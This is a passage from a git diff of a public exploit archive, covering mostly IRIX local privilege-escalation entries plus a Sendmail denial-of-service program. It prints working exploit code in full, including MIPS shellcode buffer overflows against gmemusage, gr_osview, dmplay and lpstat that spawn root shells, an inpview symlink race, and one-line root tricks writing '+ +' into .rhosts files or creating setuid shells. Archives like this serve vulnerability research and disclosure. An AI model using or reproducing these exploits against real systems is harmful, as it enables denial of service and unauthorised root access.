<sys/socket.h> +#include <sys/time.h> +#include <netinet/in.h> +#include <netdb.h> +#include <stdarg.h> +#include <errno.h> +#include <signal.h> +#include <getopt.h> +#include <stdlib.h> +#include <string.h> + +#define MAXCONN 4 +#define LINES 15000 + +struct hostent *hp; +struct sockaddr_in s; +int suck,loop,x; + +int main(int argc,char* argv[]) { + + printf("against.c - another Sendmail DoS (up to 8.9.2)\n"); + + if (argc-3) { +printf("Usage: %s victim_user victim_host\n",argv[0]); +exit(0); + } + + hp=gethostbyname(argv[2]); + + if (!hp) { +perror("gethostbyname"); +exit(1); + } + + fprintf(stderr,"Doing mess: "); + + for (;loop<MAXCONN;loop++) if (!(x=fork())) { +FILE* d; +bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length); +s.sin_family=hp->h_addrtype; +s.sin_port=htons(25); +if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket"); +if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect"); +if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); } + +usleep(100000); + +fprintf(d,"helo tweety\n"); +fprintf(d,"mail from: tweety@polbox.com\n"); +fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]); +fprintf(d,"data\n"); + +usleep(100000); + +for(loop=0;loop<LINES;loop++) { + if (!(loop%100)) fprintf(stderr,"."); + fprintf(d,"To: x\n"); +} + +fprintf(d,"\n\n\nsomedata\n\n\n"); + +fprintf(d,".\n"); + +sleep(1); + +fprintf(d,"quit\n"); +fflush(d); + +sleep(100); +shutdown(suck,2); +close(suck); +exit(0); + } + + waitpid(x,&loop,0); + + fprintf(stderr,"ok\n"); + + return 0; +} \ No newline at end of file diff --git a/platforms/irix/local/19066.txt b/platforms/irix/local/19066.txt old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19067.txt b/platforms/irix/local/19067.txt old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19163.sh b/platforms/irix/local/19163.sh index 400ee56c3..3bd6a7532 100755 --- a/platforms/irix/local/19163.sh +++ b/platforms/irix/local/19163.sh @@ -18,4 +18,4 @@ cat > /tmp/dvhtool << 'EOF' EOF /sbin/chmod 700 /tmp/dvhtool PATH=/tmp:$PATH -/sbin/ioconfig -f /hw \ No newline at end of file +/sbin/ioconfig -f /hw \ No newline at end of file diff --git a/platforms/irix/local/19210.txt b/platforms/irix/local/19210.txt old mode 100755 new mode 100644 index 2ce626445..5f53dac9a --- a/platforms/irix/local/19210.txt +++ b/platforms/irix/local/19210.txt @@ -18,5 +18,4 @@ under the midikeys window click sounds and then midi songs. This will open a fil You can enter the path and filename of files you which to read, including root owned with group/world read/write permissions unset. -If you select a file like "/usr/share/data/music/README" it will appear in a text editor. Use the text editor to open /etc/passwd and make modifications at will. Save and enjoy. - \ No newline at end of file +If you select a file like "/usr/share/data/music/README" it will appear in a text editor. Use the text editor to open /etc/passwd and make modifications at will. Save and enjoy. \ No newline at end of file diff --git a/platforms/irix/local/19262.txt b/platforms/irix/local/19262.txt old mode 100755 new mode 100644 index c4824d47c..c38bb39e3 --- a/platforms/irix/local/19262.txt +++ b/platforms/irix/local/19262.txt @@ -8,4 +8,4 @@ umask 000 cdplayer -dbcdir /usr/admin/ echo "+ +" > /usr/admin/.rhosts chown root.sys /usr/admin/.rhosts -rsh localhost -l sysadm \ No newline at end of file +rsh localhost -l sysadm \ No newline at end of file diff --git a/platforms/irix/local/19267.c b/platforms/irix/local/19267.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19268.txt b/platforms/irix/local/19268.txt old mode 100755 new mode 100644 index 00b611201..94cdaf9ee --- a/platforms/irix/local/19268.txt +++ b/platforms/irix/local/19268.txt @@ -17,4 +17,4 @@ New OK OK Cancel -double-click any of the mounted filesystems to bring up the desktopManager \ No newline at end of file +double-click any of the mounted filesystems to bring up the desktopManager \ No newline at end of file diff --git a/platforms/irix/local/19269.txt b/platforms/irix/local/19269.txt old mode 100755 new mode 100644 index 6d3762aa8..6cb19f2d2 --- a/platforms/irix/local/19269.txt +++ b/platforms/irix/local/19269.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/336/info Colorview fails to validate that the user has access to the file supplied to the -text option. As a result, users can view arbitrary files. -/usr/sbin/colorview -text /var/spool/mail/admin \ No newline at end of file +/usr/sbin/colorview -text /var/spool/mail/admin \ No newline at end of file diff --git a/platforms/irix/local/19274.c b/platforms/irix/local/19274.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19275.c b/platforms/irix/local/19275.txt old mode 100755 new mode 100644 similarity index 92% rename from platforms/irix/local/19275.c rename to platforms/irix/local/19275.txt index 8316fa85f..4904da5e2 --- a/platforms/irix/local/19275.c +++ b/platforms/irix/local/19275.txt @@ -1,6 +1,5 @@ source: http://www.securityfocus.com/bid/347/info - A vulnerability exists in the datman/cdman program, as included with Irix 6.2 and 5.3 from Silicon Graphics Inc. The vulnerability would allow arbitrary users to execute commands as root. The datman/cdman program will search for the existance of a .cdplayerrc in the users home directory. If it is found, and no .cddb directory is found, cdman will run the cddbcvt program. This program is invoked with the names of both the old and new databases via a system() call. Because of this, it is possible to substitute the names of the database with a command to be executed. @@ -19,4 +18,4 @@ system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); Created "/tmp/blah" Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah % ls -l /tmp/sh --r-sr-sr-x 1 root sys 140784 Dec 9 15:24 /tmp/sh* \ No newline at end of file +-r-sr-sr-x 1 root sys 140784 Dec 9 15:24 /tmp/sh* \ No newline at end of file diff --git a/platforms/irix/local/19276.c b/platforms/irix/local/19276.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19277.c b/platforms/irix/local/19277.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19280.txt b/platforms/irix/local/19280.txt old mode 100755 new mode 100644 index d23d7ced5..115c43e8c --- a/platforms/irix/local/19280.txt +++ b/platforms/irix/local/19280.txt @@ -34,8 +34,4 @@ cd /tmp ln -s /.rhosts fsdump.dir /var/rfindd/fsdump -Fgimme / ls -al /.rhosts -rm -f fsdump.dir fsdump.pag gimme - - - - \ No newline at end of file +rm -f fsdump.dir fsdump.pag gimme \ No newline at end of file diff --git a/platforms/irix/local/19304.txt b/platforms/irix/local/19304.txt old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19310.c b/platforms/irix/local/19310.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19313.txt b/platforms/irix/local/19313.txt old mode 100755 new mode 100644 index d88fb09f2..4e79d5836 --- a/platforms/irix/local/19313.txt +++ b/platforms/irix/local/19313.txt @@ -11,4 +11,4 @@ chmod 4755 /tmp/lpshell % netprint -n blah -h blah -p blah 1-234 % /tmp/lpshell -However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat. \ No newline at end of file +However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat. \ No newline at end of file diff --git a/platforms/irix/local/19317.c b/platforms/irix/local/19317.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19319.c b/platforms/irix/local/19319.txt old mode 100755 new mode 100644 similarity index 100% rename from platforms/irix/local/19319.c rename to platforms/irix/local/19319.txt diff --git a/platforms/irix/local/19347.c b/platforms/irix/local/19347.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/19349.txt b/platforms/irix/local/19349.txt old mode 100755 new mode 100644 index 685d43011..ded208909 --- a/platforms/irix/local/19349.txt +++ b/platforms/irix/local/19349.txt @@ -5,4 +5,4 @@ A vulnerability exists in the rmail utility, included by SGI with it's Irix oper The following example is provided: -setenv LOGNAME blah; command-to-execute \ No newline at end of file +setenv LOGNAME blah; command-to-execute \ No newline at end of file diff --git a/platforms/irix/local/19353.txt b/platforms/irix/local/19353.txt old mode 100755 new mode 100644 index 7883a43de..baaec1c38 --- a/platforms/irix/local/19353.txt +++ b/platforms/irix/local/19353.txt @@ -20,8 +20,4 @@ execl("/sbin/suid_exec","/bin/su","/bin/su",0); % ./expl Too many ('s. % ls -l /tmp/sh --r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh* - - - - \ No newline at end of file +-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh* \ No newline at end of file diff --git a/platforms/irix/local/19355.txt b/platforms/irix/local/19355.txt old mode 100755 new mode 100644 index 805ff5138..67710b6ab --- a/platforms/irix/local/19355.txt +++ b/platforms/irix/local/19355.txt @@ -9,4 +9,4 @@ A vulnerability exists in the startmidi program from Silicon Graphics. This util % ls -l /blardyblar -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar % stopmidi -d /dev/ttyd1 -% \ No newline at end of file +% \ No newline at end of file diff --git a/platforms/irix/local/19356.txt b/platforms/irix/local/19356.txt old mode 100755 new mode 100644 index 5569f9f1d..bc20b9346 --- a/platforms/irix/local/19356.txt +++ b/platforms/irix/local/19356.txt @@ -14,4 +14,4 @@ Successfully completed exit-commands from previous session. Reading installation history Checking dependencies ERROR : Software Manager: automatic installation failed: New -target (nothing installed) and no distribution. \ No newline at end of file +target (nothing installed) and no distribution. \ No newline at end of file diff --git a/platforms/irix/local/19358.txt b/platforms/irix/local/19358.txt old mode 100755 new mode 100644 index f715b1366..98d3f7852 --- a/platforms/irix/local/19358.txt +++ b/platforms/irix/local/19358.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/472/info The xfsdump program shipped with Irix 5.x and 6.x from SGI contains a vulnerability which could lead to root compromise. By creating a log file in /usr/tmp called bck.log, a user could create a symbolic link from this file to any file they wish to be created as root. This is turn could be used to compromise the system. -ln -sf /.rhosts /usr/tmp/bck.log \ No newline at end of file +ln -sf /.rhosts /usr/tmp/bck.log \ No newline at end of file diff --git a/platforms/irix/local/20126.c b/platforms/irix/local/20126.c old mode 100755 new mode 100644 index 1e48cf458..87d7d0225 --- a/platforms/irix/local/20126.c +++ b/platforms/irix/local/20126.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/1526/info Under certain versions of IRIX, the 'gr_osview' command contains a buffer overflow that local attackers can exploit to gain root privileges. The gr_osview command produces a graphical display of memory-management activity, including memory usage, page faults, TLB activity, and page swapping. This display provides a realtime window into the overall operation of the system. The buffer overflow itself is in the command-line parsing code and can be overflowed via a long user-supplied string. +*/ /*## copyright LAST STAGE OF DELIRIUM jan 1997 poland *://lsd-pl.net/ #*/ /*## /usr/sbin/gr_osview #*/ diff --git a/platforms/irix/local/20127.c b/platforms/irix/local/20127.c old mode 100755 new mode 100644 index 1e55b4bff..eba21da40 --- a/platforms/irix/local/20127.c +++ b/platforms/irix/local/20127.c @@ -1,74 +1,75 @@ +/* source: http://www.securityfocus.com/bid/1527/info - Certain versions of IRIX ship with a version libgl.so which is vulnerable to buffer overflow attacks. This library, libgl.so, is used in conjunction with graphical programs which use OpenGL. As a result a number of programs which utilize libgl.so can be exploited via this problem. The exploit which is in known public circulation at this time uses both gmemusage and gr_osview to exploit this problem. The buffer overflow itself is in how libgl.so handles the $HOME variable is handled (it is not checked for length). Further the programs which receive this $HOME variable from libgl.so further fail to limit it's size resulting in a buffer overflow attack. Should the receiving programs be SUID root (as are both gr_osview and gmemusage) the attacker will gain root access. +*/ - /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland *://lsd-pl.net/ #*/ - /*## libgl.so $HOME #*/ +/*## copyright LAST STAGE OF DELIRIUM sep 1997 poland *://lsd-pl.net/ #*/ +/*## libgl.so $HOME #*/ - #define ADRNUM 500 - #define PCHNUM 320 - #define TMPNUM 500 - #define NOPNUM 740 - #define ALLIGN 3 +#define ADRNUM 500 +#define PCHNUM 320 +#define TMPNUM 500 +#define NOPNUM 740 +#define ALLIGN 3 - char shellcode[]= - "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ - "\x24\x02\x03\xf3" /* li $v0,1011 */ - "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ - "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ - "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ - "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ - "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ - "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ - "\x03\xff\xff\xcc" /* syscall */ - "/bin/sh" - ; +char shellcode[]= + "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ + "\x24\x02\x03\xf3" /* li $v0,1011 */ + "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ + "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ + "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ + "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ + "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ + "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ + "\x03\xff\xff\xcc" /* syscall */ + "/bin/sh" +; - char jump[]= - "\x03\xa0\x10\x25" /* move $v0,$sp */ - "\x03\xe0\x00\x08" /* jr $ra */ - ; +char jump[]= + "\x03\xa0\x10\x25" /* move $v0,$sp */ + "\x03\xe0\x00\x08" /* jr $ra */ +; - char nop[]="\x24\x0f\x12\x34"; +char nop[]="\x24\x0f\x12\x34"; - main(int argc,char **argv){ - char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2]; - int i,n=-1; +main(int argc,char **argv){ + char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2]; + int i,n=-1; - printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland //lsd-pl.net/\n"); - printf("libgl.so $HOME for irix 6.2 IP:20,22\n\n"); + printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland //lsd-pl.net/\n"); + printf("libgl.so $HOME for irix 6.2 IP:20,22\n\n"); - if(argc!=2){ - printf("usage: %s {gmemusage|gr_osview}\n",argv[0]); - exit(-1); - } - if(!strcmp(argv[1],"gmemusage")) n=0; - if(!strcmp(argv[1],"gr_osview")) n=1; - if(n==-1) exit(-1); + if(argc!=2){ + printf("usage: %s {gmemusage|gr_osview}\n",argv[0]); + exit(-1); + } + if(!strcmp(argv[1],"gmemusage")) n=0; + if(!strcmp(argv[1],"gr_osview")) n=1; + if(n==-1) exit(-1); - *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10268+252+824+500; - *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10268+252+824+31868; - *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10268; + *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10268+252+824+500; + *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10268+252+824+31868; + *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10268; - envp[0]=buffer; - envp[1]=0; + envp[0]=buffer; + envp[1]=0; - b=buffer; - sprintf(b,"HOME="); - b+=5; - for(i=0;i<ALLIGN;i++) *b++=0xff; - for(i=0;i<TMPNUM;i++) *b++=tmp[i%4]; - *b++=0xff; - for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; - for(i=0;i<ALLIGN;i++) *b++=0xff; - for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; - for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; - for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; - *b=0; + b=buffer; + sprintf(b,"HOME="); + b+=5; + for(i=0;i<ALLIGN;i++) *b++=0xff; + for(i=0;i<TMPNUM;i++) *b++=tmp[i%4]; + *b++=0xff; + for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; + for(i=0;i<ALLIGN;i++) *b++=0xff; + for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; + for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; + for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; + *b=0; - switch(n){ - case 0: execle("/usr/sbin/gmemusage","lsd",0,envp); - case 1: execle("/usr/sbin/gr_osview","lsd",0,envp); - } - } \ No newline at end of file + switch(n){ + case 0: execle("/usr/sbin/gmemusage","lsd",0,envp); + case 1: execle("/usr/sbin/gr_osview","lsd",0,envp); + } +} \ No newline at end of file diff --git a/platforms/irix/local/20128.c b/platforms/irix/local/20128.c old mode 100755 new mode 100644 index 93fda895e..0f3de9fe6 --- a/platforms/irix/local/20128.c +++ b/platforms/irix/local/20128.c @@ -1,70 +1,72 @@ +/* source: http://www.securityfocus.com/bid/1528/info Certain versions of IRIX ship with a version of dmplay which is vulnerable to a buffer overflow attack. The program, dmplay, is used to play movie files under IRIX. The problem at hand is the way the program handles the DISPLAY variable for the users X terminal. It does not check bounds and therefore is vulnerable to attack by an overly long user supplied string. +*/ - /*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/ - /*## /usr/sbin/dmplay #*/ +/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/ +/*## /usr/sbin/dmplay #*/ - #define NOPNUM 800 - #define ADRNUM 156 - #define PCHNUM 148 - #define TMPNUM 52 +#define NOPNUM 800 +#define ADRNUM 156 +#define PCHNUM 148 +#define TMPNUM 52 - char shellcode[]= - "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ - "\x24\x02\x03\xf3" /* li $v0,1011 */ - "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ - "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ - "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ - "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ - "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ - "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ - "\x03\xff\xff\xcc" /* syscall */ - "/bin/sh" - ; +char shellcode[]= + "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ + "\x24\x02\x03\xf3" /* li $v0,1011 */ + "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ + "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ + "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ + "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ + "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ + "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ + "\x03\xff\xff\xcc" /* syscall */ + "/bin/sh" +; - char jump[]= - "\x03\xa0\x10\x25" /* move $v0,$sp */ - "\x03\xe0\x00\x08" /* jr $ra */ - ; +char jump[]= + "\x03\xa0\x10\x25" /* move $v0,$sp */ + "\x03\xe0\x00\x08" /* jr $ra */ +; - char nop[]="\x24\x0f\x12\x34"; +char nop[]="\x24\x0f\x12\x34"; - main(int argc,char **argv){ - char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2],display[128]; - int i; +main(int argc,char **argv){ + char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2],display[128]; + int i; - printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n"); - printf("/usr/sbin/dmplay for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n"); + printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n"); + printf("/usr/sbin/dmplay for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n"); - if(argc!=3){ - printf("usage: %s {62|63} xserver:display\n",argv[0]); - exit(-1); - } + if(argc!=3){ + printf("usage: %s {62|63} xserver:display\n",argv[0]); + exit(-1); + } - if(!strcmp(argv[1],"62")){ - *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10396+32; - *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10396+32+900+30540; - *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10396+32+8000; - } - if(!strcmp(argv[1],"63")){ - *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10348+32; - *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10348+32+900-84; - *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10348+32+8000; - } + if(!strcmp(argv[1],"62")){ + *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10396+32; + *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10396+32+900+30540; + *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10396+32+8000; + } + if(!strcmp(argv[1],"63")){ + *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10348+32; + *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10348+32+900-84; + *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10348+32+8000; + } - sprintf(display,"DISPLAY=%s",argv[2]); - envp[0]=display; - envp[1]=0; + sprintf(display,"DISPLAY=%s",argv[2]); + envp[0]=display; + envp[1]=0; - b=buffer; - for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; - for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; - *b++=0xff; - for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; - for(i=0;i<TMPNUM;i++) *b++=tmp[i%4]; - for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; - *b=0; + b=buffer; + for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; + for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; + *b++=0xff; + for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; + for(i=0;i<TMPNUM;i++) *b++=tmp[i%4]; + for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; + *b=0; - execle("/usr/sbin/dmplay","lsd",buffer,0,envp); - } \ No newline at end of file + execle("/usr/sbin/dmplay","lsd",buffer,0,envp); +} \ No newline at end of file diff --git a/platforms/irix/local/20129.c b/platforms/irix/local/20129.c old mode 100755 new mode 100644 index 585ad0698..2ac2ee86f --- a/platforms/irix/local/20129.c +++ b/platforms/irix/local/20129.c @@ -1,63 +1,65 @@ +/* source: http://www.securityfocus.com/bid/1529/info Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise. +*/ - /*## copyright LAST STAGE OF DELIRIUM nov 1998 poland *://lsd-pl.net/ #*/ - /*## /bin/lpstat #*/ +/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland *://lsd-pl.net/ #*/ +/*## /bin/lpstat #*/ - #define NOPNUM 468 - #define ADRNUM 300 - #define PCHNUM 300 +#define NOPNUM 468 +#define ADRNUM 300 +#define PCHNUM 300 - char setreuidcode[]= - "\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */ - "\x24\x02\x04\x01" /* li $v0,1024+1 */ - "\x20\x42\xff\xff" /* addi $v0,$v0,-1 */ - "\x03\xff\xff\xcc" /* syscall */ - "\x30\x44\xff\xff" /* andi $a0,$v0,0xffff */ - "\x31\x65\xff\xff" /* andi $a1,$t3,0xffff */ - "\x24\x02\x04\x64" /* li $v0,1124 */ - "\x03\xff\xff\xcc" /* syscall */ - ; +char setreuidcode[]= + "\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */ + "\x24\x02\x04\x01" /* li $v0,1024+1 */ + "\x20\x42\xff\xff" /* addi $v0,$v0,-1 */ + "\x03\xff\xff\xcc" /* syscall */ + "\x30\x44\xff\xff" /* andi $a0,$v0,0xffff */ + "\x31\x65\xff\xff" /* andi $a1,$t3,0xffff */ + "\x24\x02\x04\x64" /* li $v0,1124 */ + "\x03\xff\xff\xcc" /* syscall */ +; - char shellcode[]= - "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ - "\x24\x02\x03\xf3" /* li $v0,1011 */ - "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ - "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ - "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ - "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ - "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ - "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ - "\x03\xff\xff\xcc" /* syscall */ - "/bin/sh" - ; +char shellcode[]= + "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ + "\x24\x02\x03\xf3" /* li $v0,1011 */ + "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ + "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ + "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ + "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ + "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ + "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ + "\x03\xff\xff\xcc" /* syscall */ + "/bin/sh" +; - char jump[]= - "\x03\xa0\x10\x25" /* move $v0,$sp */ - "\x03\xe0\x00\x08" /* jr $ra */ - ; +char jump[]= + "\x03\xa0\x10\x25" /* move $v0,$sp */ + "\x03\xe0\x00\x08" /* jr $ra */ +; - char nop[]="\x24\x0f\x12\x34"; +char nop[]="\x24\x0f\x12\x34"; - main(int argc,char **argv){ - char buffer[10000],adr[4],pch[4],*b; - int i; +main(int argc,char **argv){ + char buffer[10000],adr[4],pch[4],*b; + int i; - printf("copyright LAST STAGE OF DELIRIUM nov 1998 poland //lsd-pl.net/\n"); - printf("/bin/lpstat for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n"); + printf("copyright LAST STAGE OF DELIRIUM nov 1998 poland //lsd-pl.net/\n"); + printf("/bin/lpstat for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n"); - *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8888+1364+140-15012; - *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8888+140+544+32748; + *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8888+1364+140-15012; + *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8888+140+544+32748; - b=buffer; - *b++=0xff; - for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; - for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i]; - for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; - for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; - for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; - *b=0; + b=buffer; + *b++=0xff; + for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; + for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i]; + for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; + for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; + for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; + *b=0; - execl("/bin/lpstat","lsd","-n",buffer,0); - } \ No newline at end of file + execl("/bin/lpstat","lsd","-n",buffer,0); +} \ No newline at end of file diff --git a/platforms/irix/local/20130.c b/platforms/irix/local/20130.c old mode 100755 new mode 100644 index 619e3e07d..7f81b8778 --- a/platforms/irix/local/20130.c +++ b/platforms/irix/local/20130.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/1530/info Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition. @@ -5,46 +6,47 @@ Certain versions of IRIX ship with a version of inpview that creates files in '/ InPerson's 'inpview' is a networked multimedia conferencing tool. InPerson provides multiway audio and video conferencing with a shared whiteboard, combined into a single, easy-to-use application. You use a separate "phone" tool to place and answer calls. The 'inpview' program writes out temporary files in the '/var/tmp' directory. Because these filenames are not random, an attacker can create a symlink to a previously created filename and force the SUID 'inpview' to overwrite the file with 'rw-rw-rw' permissions. +*/ - /*## copyright LAST STAGE OF DELIRIUM jan 2000 poland *://lsd-pl.net/ #*/ - /*## /usr/lib/InPerson/inpview #*/ +/*## copyright LAST STAGE OF DELIRIUM jan 2000 poland *://lsd-pl.net/ #*/ +/*## /usr/lib/InPerson/inpview #*/ - /* sets rw-rw-rw permissions */ +/* sets rw-rw-rw permissions */ - #include <sys/types.h> - #include <dirent.h> - #include <stdio.h> +#include <sys/types.h> +#include <dirent.h> +#include <stdio.h> - main(int argc,char **argv){ - DIR *dirp;struct dirent *dentp; +main(int argc,char **argv){ + DIR *dirp;struct dirent *dentp; - printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/\n"); - printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n"); + printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/\n"); + printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n"); - if(argc!=2){ - printf("usage: %s file\n",argv[0]); - exit(-1); - } + if(argc!=2){ + printf("usage: %s file\n",argv[0]); + exit(-1); + } - if(!fork()){ - nice(-20);sleep(2);close(0);close(1);close(2); - execle("/usr/lib/InPerson/inpview","lsd",0,0); - } + if(!fork()){ + nice(-20);sleep(2);close(0);close(1);close(2); + execle("/usr/lib/InPerson/inpview","lsd",0,0); + } - printf("looking for temporary file... ");fflush(stdout); - chdir("/var/tmp"); - dirp=opendir("."); - while(1){ - if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;} - if(!strncmp(dentp->d_name,".ilmpAAA",8)) break; - } - closedir(dirp); - printf("found!\n"); - while(1){ - if(!symlink(argv[1],dentp->d_name)) break; - } - sleep(2); - unlink(dentp->d_name); + printf("looking for temporary file... 